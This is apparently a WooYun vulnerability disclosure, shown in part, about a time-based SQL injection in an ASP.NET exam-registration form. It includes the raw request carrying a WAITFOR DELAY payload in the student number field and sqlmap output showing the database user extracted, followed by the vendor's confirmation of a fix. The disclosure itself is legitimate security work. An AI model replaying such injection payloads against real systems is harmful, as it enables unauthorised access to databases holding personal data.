eWNl+Wkp+WtpgzkuK3lsbHlpKflraYM5Lit5aSu55S15aSnGOS4reWkruW5v+aSreeUteinhuWkp+WtphLkuK3lpK7pn7PkuZDlrabpmaIM6Ye
N5bqG5aSn5a2mGOmHjeW6huW5v+aSreeUteinhuWkp+WtphV4ATADMTE3Ajg5AjgzAjc1AzExOAIxOAIxNgI2NgIxNwI4NgE4AjI1AzEzNAMxM
zcDMTM4AzEzMAMxMTECNzQDMTI0AjEzAjU3AjEyAjQwAjg3AzEwMQI1NgIyMAI2MwMxMjECNTkCNjADMTE1Ajg1AzEwNwI3OAMxMjMCMzcDMTA
wAzEzMwMxMjADMTAzAzEwNQI3NwI5OAIxOQIyNAIzOAI2MQIxNQEzAjM5Ajk2Ajg4AzEwNAMxMjYCODACNjcCOTcCMjcCOTUCMjICOTQDMTA5A
zExNgMxMjgCMzQCNDkDMTE5AzEyMgI3MgIzNQI1NAI3NgI1MAI0NwMxMTQCNjIDMTI5AjcwAjE0AjkzAjk5AjgxAzEzMQIyMQI2OQI1OAI0NgI
2NAE5AjkwAjc5AzEzMgE2ATcDMTM1AzEyNQMxMDIDMTEwAzEwOAI1NQI3MQI5MgI1MgIzMQMxMjcCODICNTECNTMDMTM2AjQ4AjExAjczAjMzA
zEzOQI2NQIzMgI0MQMxMDYUKwN4Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2d
nZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCBw8PZBYCHwMFF1N1Ym1pdEtleUNsa
WNrKCdidG5PSycpZAIJDw9kFgIfAwUXU3VibWl0S2V5Q2xpY2soJ2J0bk9LJylkAgsPD2QWAh8DBRdTdWJtaXRLZXlDbGljaygnYnRuT0snKWR
k+kdlGZ001Ezd9H5koRgx91bT9Q8=&__VIEWSTATEGENERATOR=E942AD35&__EVENTVALIDATION=/wEWgAEChbLvlgECjOeKxgYCvsz00QkC
yK2E8QcCtszY0QkCtsyA0gkCp8yI0gkC/8fErw8CoczU0QkCocyM0gkCpMyM0gkCocyQ0gkCtsyM0gkCtsz00QkCoMyI0gkCu/CmsQECyK2M8Q
cC/8fMrw8Ch43fhQ4C6rT5cAKnzITSCQK78KKxAQKhzIDSCQKlzJDSCQKhzLzSCQKizLTSCQK2zJDSCQLqtPVwAqXMjNIJAqDMtNIJAqTMgNIJ
Auq0/XACpczY0QkCpMy00gkCnp/AmwsCtsyI0gkCyK2A8QcCp8zU0QkC1MqAxgwCo8yQ0gkCh43ThQ4C1MqExgwCh43bhQ4C1Mq4xgwCnp/8mw
sCp8yQ0gkCuczU0QkCoczY0QkCoMyE0gkCo8zU0QkCpMy40gkCocyI0gkCo8z00QkCo8zY0QkCucyM0gkCtszU0QkCu/DasAEC5Ybmhg0Ctsy0
0gkCpMyQ0gkCucyQ0gkCoMyQ0gkCucyI0gkCoMy80gkCucyE0gkCwu7imgEC5Ybihg0C/8fIrw8Co8yE0gkCoszY0QkCwu7mmgEC8aOf2woCp8
y80gkCo8yI0gkCpcyE0gkCp8yM0gkCpcy00gkCosyQ0gkCu/DesAECpMy80gkCwu7qmgECp8y00gkCocyE0gkCucyA0gkCuczY0QkCtsy40gkC
6rTBcAKgzLjSCQKkzNjRCQKlzNTRCQKizIzSCQKkzITSCQK5zPTRCQK5zLTSCQKnzNjRCQLxo+PbCgKkzPTRCQKnzPTRCQKen8ibCwKen8SbCw
Lxo5fbCgKHjdeFDgL/x8CvDwKlzIjSCQKnzLjSCQK5zLzSCQKlzLzSCQKjzLjSCQLIrYjxBwK2zLzSCQKlzLjSCQKlzIDSCQLlhuqGDQKizNTR
CQKhzLjSCQKnzIDSCQKjzIDSCQLC7u6aAQKkzIjSCQKjzLzSCQKizLjSCQLlhp6GDQK+mcmVDALO5KbQDgLEruwcApjZhZcGAoX4mYcLAt2SmY
8BVdgIpfg3EAksvm2FbGm3s3yHryE=&dropNetSchool=89&hid=aa&txtStudentNumber=2008601001&txtStudentCrtificateNumber=
2008601001' WAITFOR DELAY '0:0:5'--&txtCheckCode=x433&btnOK=%C8%B7 %B6%A8
---
[09:00:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[09:00:47] [INFO] fetching current user
[09:00:48] [WARNING] time-based comparison requires larger statistical model, please wait.....................
.........
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[09:01:01] [WARNING] it is very important not to stress the network adapter during usage of time-based payload
s to prevent potential errors
[09:01:12] [INFO] adjusting time delay to 2 seconds due to good response times
tongkao2015
current user:    'tongkao2015\x05'


漏洞证明:

2.jpg


只检测了漏洞存在,未深入获取数据

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-07-14 14:40

厂商回复:

非常感谢!漏洞已进行修正。
避免不必要信息泄漏,感谢!!!

最新状态:

暂无